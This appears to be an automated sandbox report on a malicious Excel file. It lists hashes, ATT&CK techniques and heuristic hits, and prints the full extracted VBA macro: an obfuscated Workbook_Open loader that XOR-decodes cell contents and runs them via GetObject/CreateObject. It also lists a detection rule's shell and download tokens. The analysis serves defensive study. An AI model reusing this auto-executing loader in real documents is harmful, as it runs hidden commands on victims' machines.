Office (OLE) / .XLS malware analysis — malicious · 96e6ea363e1df3de

MALICIOUS

Office (OLE) / .XLS

66.5 KB Created: 2023-09-12 08:28:58 Authoring application: Microsoft Excel First seen: 2023-09-14

MD5: 6d28bfe2447e21a17a61dcbf695a7da0 SHA-1: 7120d286ecdd775bb25f387affd26248aff7d5bf SHA-256: 96e6ea363e1df3de9f59bed0b732f38293b343d3192e3c69d69475232ff0225d

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro that utilizes CreateObject and GetObject calls. The macro appears to be obfuscated, but the presence of these functions strongly suggests it's designed to download and execute a secondary payload. The 'Liver' function, which processes byte arrays, likely decodes and executes the payload from a remote source.

Heuristics 5

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

GetObject(Karen).CreateObject(Repeated).Run Pentium & " " & Steam & Potentially, 0

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

GetObject(Karen).CreateObject(Repeated).Run Pentium & " " & Steam & Potentially, 0

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4194 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4194 bytes
SHA-256: `73c7b96972c08461a2b3ab2971b2e00135d69a49c5fffee6f6a3afb8f5914464`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Private Function Liver(ByVal SunSet As String) As Variant Dim Attempts As Long: Attempts = 0: Dim Fotos() As Byte Dim Voters() As Byte, Brush As String, Faced As Integer, Charlie As Integer, Continental As Integer Voters = "f5f2b37dc7" GoTo Nurses Assess: If Attempts < UBound(Fotos) Then Faced = Attempts Mod (10) Continental = Voters(Faced * 2) Charlie = Fotos(Attempts) GoTo Renewal Monkey: Brush = Brush & Chr(Fotos(Attempts)) Attempts = Attempts + 1 GoTo Assess Else GoTo Literary End If Literary: Liver = Brush Exit Function Nurses: Fotos = Berkeley(SunSet) GoTo Assess Renewal: Fotos(Attempts) = Abs(Charlie Xor Continental) GoTo Monkey End Function Private Sub Hospitality(ByVal Karen As String, ByVal Potentially As String, ByVal Pentium As String, ByVal Repeated As String, ByVal Steam As String) GetObject(Karen).CreateObject(Repeated).Run Pentium & " " & Steam & Potentially, 0 End Sub Sub Workbook_Open() Hospitality Liver(Sheets("wfe5").Range("H114").Value), Liver(Sheets("wfe5").Range("G172").Value), Liver(Sheets("wfe5").Range("J159").Value), Liver(Sheets("wfe5").Range("E148").Value), Liver(Sheets("wfe5").Range("E146").Value) End Sub Private Function Berkeley(ByVal Builders As String) As Variant Dim Brush() As Byte, i As Long, Faced As Integer, OrganizatiOnal As Integer OrganizatiOnal = Len(Builders) / 2: i = 0: ReDim Brush(0 To OrganizatiOnal) As Byte Continental: If i < Len(Builders) Then Faced = Faced + 1 Brush(Faced - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(Builders, i + 1, 2) i = i + 2 GoTo Continental Else GoTo Astronomy Dim Renewal As String Renewal = InputBox("celp lape") End If Astronomy: Berkeley = Brush End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 73c7b96972c08461a2b3ab2971b2e00135d69a49c5fffee6f6a3afb8f5914464

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit








                                                    Private Function Liver(ByVal SunSet As String) As Variant
Dim Attempts As Long: Attempts = 0: Dim Fotos() As Byte







                                                    Dim Voters() As Byte, Brush As String, Faced As Integer, Charlie As Integer, Continental As Integer
Voters = "f5f2b37dc7"
GoTo Nurses






Assess:






                                                        




          If Attempts < UBound(Fotos) Then








                                                                        Faced = Attempts Mod (10)






                                                                        







          




                                                                        Continental = Voters(Faced * 2)








                                                            Charlie = Fotos(Attempts)







                 GoTo Renewal
Monkey:
Brush = Brush & Chr(Fotos(Attempts))
Attempts = Attempts + 1






                 




           GoTo Assess






                                                            Else
GoTo Literary
End If
Literary:








             Liver = Brush
Exit Function







Nurses:
Fotos = Berkeley(SunSet)
GoTo Assess
Renewal:
Fotos(Attempts) = Abs(Charlie Xor Continental)








                GoTo Monkey





                




                   End Function
Private Sub Hospitality(ByVal Karen As String, ByVal Potentially As String, ByVal Pentium As String, ByVal Repeated As String, ByVal Steam As String)
GetObject(Karen).CreateObject(Repeated).Run Pentium & " " & Steam & Potentially, 0







                                                End Sub
Sub Workbook_Open()







                                                                            Hospitality Liver(Sheets("wfe5").Range("H114").Value), Liver(Sheets("wfe5").Range("G172").Value), Liver(Sheets("wfe5").Range("J159").Value), Liver(Sheets("wfe5").Range("E148").Value), Liver(Sheets("wfe5").Range("E146").Value)






            End Sub






                                                                




                                            Private Function Berkeley(ByVal Builders As String) As Variant








                Dim Brush() As Byte, i As Long, Faced As Integer, OrganizatiOnal As Integer





                                        OrganizatiOnal = Len(Builders) / 2: i = 0: ReDim Brush(0 To OrganizatiOnal) As Byte
Continental:






                If i < Len(Builders) Then






                                                                Faced = Faced + 1





                                                                        






             Brush(Faced - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(Builders, i + 1, 2)
i = i + 2





                                                                    GoTo Continental





           Else





              GoTo Astronomy





                 





                  Dim Renewal As String







                   






                   Renewal = InputBox("celp lape")







                  End If







Astronomy:





                                            Berkeley = Brush
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.